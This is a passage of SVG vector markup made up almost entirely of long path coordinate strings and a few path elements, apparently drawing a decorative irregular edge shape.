4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1